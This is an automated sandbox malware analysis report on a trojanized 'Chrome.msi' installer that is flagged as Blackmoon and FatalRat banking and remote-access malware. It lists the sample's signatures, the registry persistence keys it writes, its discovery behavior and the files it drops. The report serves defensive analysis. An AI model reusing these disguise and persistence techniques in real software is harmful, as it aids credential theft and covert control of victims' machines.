Malware Analysis Report

2025-03-15 03:49

Sample ID 250221-23pn8asrdr
Target Chrome.msi
SHA256 1924b09ff1e25fe9d39bad70f094766863f366543658627fe94f435b07da6109
Tags
blackmoon fatalrat banker discovery infostealer persistence privilege_escalation rat spyware stealer trojan vmprotect
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1924b09ff1e25fe9d39bad70f094766863f366543658627fe94f435b07da6109

Threat Level: Known bad

The file Chrome.msi was found to be: Known bad.

Malicious Activity Summary

blackmoon fatalrat banker discovery infostealer persistence privilege_escalation rat spyware stealer trojan vmprotect

Detect Blackmoon payload

Fatalrat family

FatalRat

Blackmoon, KrBanker

Blackmoon family

Fatal Rat payload

VMProtect packed file

Enumerates connected drives

Event Triggered Execution: Image File Execution Options Injection

Boot or Logon Autostart Execution: Active Setup

Checks computer location settings

Drops file in System32 directory

Event Triggered Execution: Component Object Model Hijacking

Loads dropped DLL

Drops file in Windows directory

Executes dropped EXE

Checks installed software on the system

Drops file in Program Files directory

Checks system information in the registry

System Network Configuration Discovery: Internet Connection Discovery

Enumerates physical storage devices

Browser Information Discovery

Reads user/profile data of web browsers

System Location Discovery: System Language Discovery

Event Triggered Execution: Installer Packages

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Delays execution with timeout.exe

Uses Volume Shadow Copy service COM API

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-02-21 23:06

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2025-02-21 23:06

Reported

2025-02-21 23:10

Platform

win11-20250217-en

Max time kernel

149s

Max time network

152s

Command Line

C:\Windows\system32\svchost.exe -k DcomLaunch -p

Signatures

Blackmoon family

blackmoon

Blackmoon, KrBanker

trojan banker blackmoon

Detect Blackmoon payload

Description Indicator Process Target
N/A N/A N/A N/A

FatalRat

stealer trojan fatalrat

Fatalrat family

fatalrat

Fatal Rat payload

rat infostealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Localized Name = "Google Chrome" C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\IsInstalled = "1" C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Version = "43,0,0,0" C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\ = "Google Chrome" C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\StubPath = "\"C:\\Program Files\\Google\\Chrome\\Application\\133.0.6943.127\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level --channel=stable" C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe\DisableExceptionChainValidation = "0" C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TjNkNpAilaYvt.exe.log C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Checks installed software on the system

discovery

Checks system information in the registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\v8_context_snapshot.bin C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\optimization_guide_internal.dll C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ar.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ur.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\chrome_200_percent.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\fa.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\lt.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\vi.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\chrome.exe.sig C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_da.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\psuser.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\SETUP.EX_ C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\133.0.6943.127_chrome_installer.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\ca.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\el.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\fil.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\gu.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\chrome_pwa_launcher.exe C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ko.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_nl.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_sv.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\133.0.6943.127\133.0.6943.127_chrome_installer.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\chrome.7z C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\ar.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\eventlog_provider.dll C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\psmachine_64.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\bg.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\en-US.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\fi.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\he.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\th.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\VisualElements\SmallLogoDev.png C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_bn.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_te.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\ro.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\sv.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_de.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_el.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_es.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_fil.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\VisualElements\SmallLogoCanary.png C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\default_apps\external_extensions.json C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\en-GB.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\ur.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\VisualElements\LogoBeta.png C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\vulkan-1.dll C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Application\133.0.6943.127\Installer\setup.exe C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Application\chrome_proxy.exe C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_hr.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\d3dcompiler_47.dll C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\fr.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\sr.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\ta.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\VisualElements\SmallLogoBeta.png C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\WidevineCdm\manifest.json C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_et.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\af.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\et.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\lv.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\zh-CN.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\chrome_proxy.exe C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_cs.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_zh-TW.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF39A7FB155A41751B.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\psuser_64.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_bg.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_fa.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_uk.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1712_2025928992\manifest.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Windows\Installer\MSICF95.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleCrashHandler.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdateOnDemand.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ko.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ml.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_zh-CN.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\Crashpad\settings.dat C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1712_2025928992\Filtering Rules C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_fr.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_lt.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_zh-TW.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ca.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_de.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_es-419.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_hr.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdateBroker.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\psmachine.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\Installer\e57ce7b.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ja.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_pt-PT.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ru.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\chrome_installer.log C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\Crashpad\metadata C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1712_2025928992\_metadata\verified_contents.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1712_2025928992\manifest.fingerprint C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_kn.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ta.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdateComRegisterShell64.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_am.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ar.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_it.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_sr.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdateSetup.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\~DFA7B22E0C069728C1.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdate.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
